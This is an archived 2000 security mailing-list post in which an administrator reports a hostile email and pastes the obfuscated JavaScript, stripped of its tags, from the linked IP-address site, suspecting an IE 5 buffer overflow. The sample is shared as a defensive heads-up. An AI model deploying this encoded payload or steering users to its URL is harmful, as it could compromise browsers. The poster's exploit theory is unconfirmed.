Security Incidents mailing list archives
Hostile email
From: mmurray () TAOS COM (mmurray () TAOS COM)
Date: Wed, 12 Jul 2000 08:38:48 -0400
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hey all... Got an email containing this this morning [Note: those were HTML tags; I removed the tags around them, so that it's benign]: a href="http://209.235.47.178/index.html"/a a href="http://209.235.47.178/index.html"owwww! my ass!/a___ Just so that everybody knows, the subject line of the email is "Is this Jim?", and it was BCC'd to me. Sender was a yahoo.com email address with a reply-to that was at aol.com. I'm guessing that both were spoofed (although I haven't bounced yet on either). Never had a spoofed with a reply-to; seems kinda strange. Went to the site, and it's a blank site except for a piece of Javascript: (source follows, tags removed) html script src="_" /script script language="Javascript" !-- function rm(){var rmt="%%%%%%%%%NNNNN[[[[[NNNa%%%%%%%%%NNNN>[[[[[NNN^%%%%%%%%%NNNNC[[[[[NNNL%%%%%% %%%NNNN][[[[[NNNW%%%%%%%%%NNNNr[[[[[NNNL%%%%%%%%%NNNNN[[[[[NNNI%%%%%%%%%NNNN#[[[ [[NNN^%%%%%%%%%NNNN9[[[[[NNNB%%%%%%%%%NNNN1[[[[[NNN/%%%%%%%%%NNNN~[[[[[NNN/%%%%% %%%%NNNNr[[[[[NNNx%%%%%%%%%NNNNN[[[[[NNNN%%%%%%%%%NNNN][[[[[NNNU%%%%%%%%%NNNNP[[ [[[NNNh%%%%%%%%%NNNNr[[[[[NNNe%%%%%%%%%NNNNC[[[[[NNNU%%%%%%%%%NNNNN[[[[[NNNI%%%% %%%%%NNNNP[[[[[NNN^%%%%%%%%%NNNN,[[[[[NNN\t%%%%%%%%%NNNNN[[[[[NNNU%%%%%%%%%NNNNr [[[[[NNNT%%%%%%%%%NNNNf[[[[[NNN\t%%%%%%%%%NNNNC[[[[[NNNu%%%%%%%%%NNNNN[[[[[NNNB% %%%%%%%%NNNNv[[[[[NNNx%%%%%%%%%NNNN7[[[[[NNN|%%%%%%%%%NNNNs[[[[[NNNt%%%%%%%%%NNN N~[[[[[NNNh%%%%%%%%%NNNN9[[[[[NNNn%%%%%%%%%NNNN<[[{[[NNNU%%%%%%%%%NNNNN[[z[[NNN| %%%%%%%%%NNNNc[[U[[NNNa%%%%%%%%%NNNN7[[n[[NNN^%%%%%%%%%NNNNP[[d[[NNNL%%%%%%%%%NN NN,[[N[[NNNW%%%%%%%%%NNNNN[{z[[NNNL%%%%%%%%%NNNN+[+j[[NNNI%%%%%%%%%NNNN7[s&[[NNN ^%%%%%%%%%NNNNs[#U[[NNNB%%%%%%%%%NNNNN[X4[[NNN/%%%%%%%%%NNNN7[CU[[NNNP%%%%%%%%%N NNN,[Nu[[NNNh%%%%%%%%%NNNN~[]B[[NNNL%%%%%%%%%NNNN`[sx[[NNN\t%%%%%%%%%NNNNN[)\n[[ NNNu%%%%%%%%%NNNNH[BS[[NNN&%%%%%%%%%NNNN;[xS[[NNNu%%%%%%%%%NNNNa[=F[[NNNd%%%%%%% %[NNNNV[a([[NNNo%%%%%%%%[NNNN@[}+[[NNNL%%%%%%%%[NNNNN[L+[[NNNU%%%%%%%%[NNNNr[ex[ [NNNu%%%%%%%%[NN%N7[4?[[NNN/%%%%%%%%[NN{N9[x%[[NNN.%%%%%%%%[NN}N#[N{[[NNNu%%%%%% %%[NN\tN`[^$[[NNN\t%%%%%%%%[NNWN<[&z[[NNNL%%%%%%%%[NNnN{[uU[[NNNI%%%%%%%%[NN?N$[ Un[[NNNu%%%%%%%%[NN%Nr[4d[[NNNh%%%%%%%%[NN[NP[4?[[NNNN%%%%%%%%[NN[Nr[t%[[NNNL%%% %%%%%[NN[N~[h{[[NNNu%%%%%%%%[NN[NC[j$[[NNNI%%%%%%%%[NN[N?[B}[[NNN\t%%%%%%%%[NN[N %[xL[[NNN.%%%%%%%%[NN[N{[de[[NNNx%%%%%%%%[NN[N$[\t4[[NNN?%%%%%%%%[NN[N}[^?[[NNN{ %%%%%%%%[NN[N\t[x[[[NNNt%%%%%%%%[NN[NW[N[[[NNNe%%%%%%%%[NN[Nn[h[[[NNNj%%%%%%%%[N N[N?[U[[[NNNN%%%%%%%%[NN[N[{u[[[NNN^%%%%%%%%[NN[NN+\t[[[NNNu%%%%%%%%[NN[NNs^[[[N NN&%%%%%%%%[NN[NN#t[[[NNNB%%%%%%%%[NN[NNX![[[NNNx%%%%%%%%[NN[NNC\t[[NNNN}%%%%%%% %[NN[NN]?[[NNNNL%%%%%%%%[NN[NNCN[[NNNNL%%%%%%%%[NN[NNr%[[NNNNo%%%%%%%%[NN[NNN[[[ NNNNY%%%%%%%%[NN[NNs[[[NNNN$%%%%%%%%[NN[NN7[[[NNNN$%%%%%%%%[NN[NNv[[[NNNN|%%%%%% %%[NN[NN][[[NNNN|%%%%%%%%[NN[NNB[[[NNNN|%%%%%%%%[NN[NNx[[[NNN%a%%%%%%%%[NN[NN;[[ [NNN{u%%%%%%%%[NN[NNS[[[NNNo\t%%%%%%%%[NN[NNS[[[NNN?!%%%%%%%%[NN[NN [[[NNN-^%%%%%%%%[NN[NNx[[[NNNhU%%%%%%%%[NN[NNN[[[NNNz\\%%%%%%%%[NN[NNz[[[NNN^L%% %%%%%%[NN[NNU[[[NNNoa%%%%%%%%[NN[NNu[[[NNN.&%%%%%%%%[NN[NNn[[[NNN{U%%%%%%%%[NN[[ N\t[[[NNN$e%%%%%%%%[NN[[Nu[[[NNNo$%%%%%%%%[NN[[NB[[[NNN?t%%%%%%%%[NN[[Nx[[[NNN{e %%%%%%%%[NN[[NS[[[NNNzW%%%%%%%%[NN[[Nx[[[NNNuj%%%%%%%%[NN[[NN[[[NNN?\t%%%%%%%%[N N[[Ne[[[NNN{^%%%%%%%%[NN[[NW[[[NNNo$%%%%%%%%[NN[[Nu[[[NNNN\t%%%%%%%%[NN[[Nj[[[NN NWh%%%%%%%%[NN[[Nt[[[NNN4&%%%%%%%%[NN[[Nh[[[NNNtj%%%%%%%%[NN[[N}[[[NNNjI%%%%%%%% [NN[[N\t[[[NNNhd%%%%%%%%[NN[[Nt[[[NNNBa%%%%%%%%[NN[[Nj[[[NNNxj%%%%%%%%[NN[[N}[[[ NNN&t%%%%%%%%[NN[[NL[[[NNN\t\\%%%%%%%%[NN[[NB[[[NNNhx%%%%%%%%[NN[[Nx[[[NNNLN%%%% %%%%[NN[[NS[[[NNN\tW%%%%%%%%[NN[[Nx[[[NNNu4%%%%%%%%[NN[[NN[[[NNNxL%%%%%%%%[NN[[N e[[[NNN?B%%%%%%%%[NN[[NW[[[NNN{x%%%%%%%%[NN[[Nu[[[NNNW|%%%%%%%%[NN[[[j[[[NNNN|%% %%%%%%[NN[[[t[[[NNN}|%%%%%%%%[NN[[[h[[[NNNua%%%%%%%%[NN[[[|[[[NNN\ts%%%%%%%%[NN[ [[t[[[NNN\\\t%%%%%%%%[NN[[[n[[[NNNB!%%%%%%%%[NN[[[L[[[NNNx]%%%%%%%%[NN[[[}[[[NNN }U%%%%%%%%[NN[[[B[[[NNNL\\%%%%%%%%[NN[[[x[[[NNNLL%%%%%%%%[NN[[[S[[[NNNoa%%%%%%%% [NN[[[x[[[NNNY&%%%%%%%%[NN[[[?[[[NNN$U%%%%%%%%[NN[[[N[[[NNN$e%%%%%%%%[NNN[[[[[[N NN|x%%%%%%%%[NNN[[[[[[NNN|N%%%%%%%%%NNN[[[[[[NNN|z%%%%%%%%{NNN[[[[[[NNNaU%%%%%%% %}NNN[[[[[[NNNuu%%%%%%%%LNNN[[[[[[NNN\tn%%%%%%%%eNNN[[[[[[NNN!\t%%%%%%%%4NNN[[[[ [[NNN^u%%%%%%%%?NNN[[[[[[NNNUB%%%%%%%%NNNN[[[[[[NNN\\x%%%%%%%%NNNN[[[[[[NNNLS%%% %%%%%NNNN[[[[[[NNNax%%%%%%%%NNNN[[[[[[NNN&N%%%%%%%%NNNN[[[[[[NNNU|%%%%%%%%NNNN[[ [[[[NNNet%%%%%%%%NNNN[[[[[[NNN$n%%%%%%%%NNNN[[[[[[NNN\tL%%%%%%%%NNNN[[[[[[NNNh}% %%%%%%%NNNN[[[[[[NNNLB%%%%%%%%NNNN[[[[[[NNN\tx%%%%%%%%NNNN[[[[[[NNNu\"%%%%%%%%NN NN[[[[[[NNNa\"%%%%%%%%NNNN[[[[[[NNN}x%%%%%%%%NNNN[[[[[[NNNLN%%%%%%%%NNNN[[[[[[NN Ne}%%%%%%%%NNNN[[[[[[NNN4\t%%%%%%%%NNNN[[[[[[NNNxt%%%%%%%%NNNN[[[[[[NNNNj%%%%%%% %NNNN[[[[[[NNNU}%%%%%%%%NNNN{[[[[[NNNhL%%%%%%%%NNNNr[[[[[NNNeB%%%%%%%%NNNNP[[[[[ NNNUx%%%%%%%%NNNNr[[[[[NNNI\"%%%%%%%%NNNN~[[[[[NNN^@%%%%%%%%NNNNC[[[[[NNN\tx%%%% %%%%NNNN?[[[[[NNNU?%%%%%%%%NNNN,[[[[[NNNI{%%%%%%%%NNNN#[[[[[NNNL$%%%%%%%%NNNNX[[ [[[NNNBW%%%%%%%%NNNNC[[[[[NNNx?%%%%%%%%NNNN9[[[[[NNN^{%%%%%%%%NNNNN[[[[[NNN\t$%% %%%%%%NNNNr[[[[[NNN4o%%%%%%%%NNNNf[[[[[NNN\\?%%%%%%%%NNNNC[[[[[",rmv=1,rms=966,r mr=46;document.write((rmo)((rmt),(rms),(rmr),(rmv)));}(rm()); //-- /script /html As I read this, it looks like it's designed to overflow a buffer in the browser. Best guess is that it exploits a vulnerability in IE 5, but I haven't proved that yet (I'm currently on a Linux box that was NOT vulnerable). Anybody back me up on the theory? Anybody else seen this? Just thought I'd put out a head's up... Mike ___________________________________________________________ Mike Murray mmurray () taos com System and Network Administrator Taos -- The Sys Admin Company San Francisco, CA pager: 415-253-2786 ___________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.2 iQA/AwUBOWxm1R93UCkjW5r0EQJmLACg6HRpX6ftJNwSB69hhz4Ibm3/F3gAnRT5 NvjPz3NNZxupcNqcGMukm5P2 =Axih -----END PGP SIGNATURE-----
Current thread:
- Re: lifestages on IRC, (continued)
- Re: lifestages on IRC Robert van der Meulen (Jul 10)
- Re: lifestages on IRC Vincent Hillier (Jul 10)
- Re: lifestages on IRC T. H. Haymore (Jul 10)
- Re: scan log and subsequent response from the host's ISP Forrester, Mike (Jul 07)
- tin.it and others non collaborative isps. Osvaldo Janeri Filho (Jul 07)
- Re: tin.it and others non collaborative isps. Bradley Woodward (Jul 10)
- Some stats of events Henri J. Schlereth (Jul 10)
- Re: tin.it and others non collaborative isps. gabriel rosenkoetter (Jul 10)
- Re: tin.it and others non collaborative isps. Philipp Buehler (Jul 11)
- Re: tin.it and others non collaborative isps. Richard Bejtlich (Jul 11)
- Hostile email mmurray () TAOS COM (Jul 12)
- I Was rooted Andrew Heath (Jul 17)
- Obfuscated URL's in spam Kee Hinckley (Jul 18)
- 85.85.85.85 weirdness Wozz (Jul 18)
- Re: 85.85.85.85 weirdness Pascal Bouchareine (Jul 19)
- Re: 85.85.85.85 weirdness Wozz (Jul 19)
- Re: 85.85.85.85 weirdness Jud (Jul 19)
- msnhome.talkcity.com Dirk Koopman (Jul 21)
- Re: msnhome.talkcity.com Ryan Yagatich (Jul 24)
- Anyone ever heard of "rlumkaus" virus/bug/trojan/backdoor? Litscher, Steven (Jul 21)
- tin.it and others non collaborative isps. Osvaldo Janeri Filho (Jul 07)
- Sudden increase in scans. Rune Kristian Viken (Jul 20)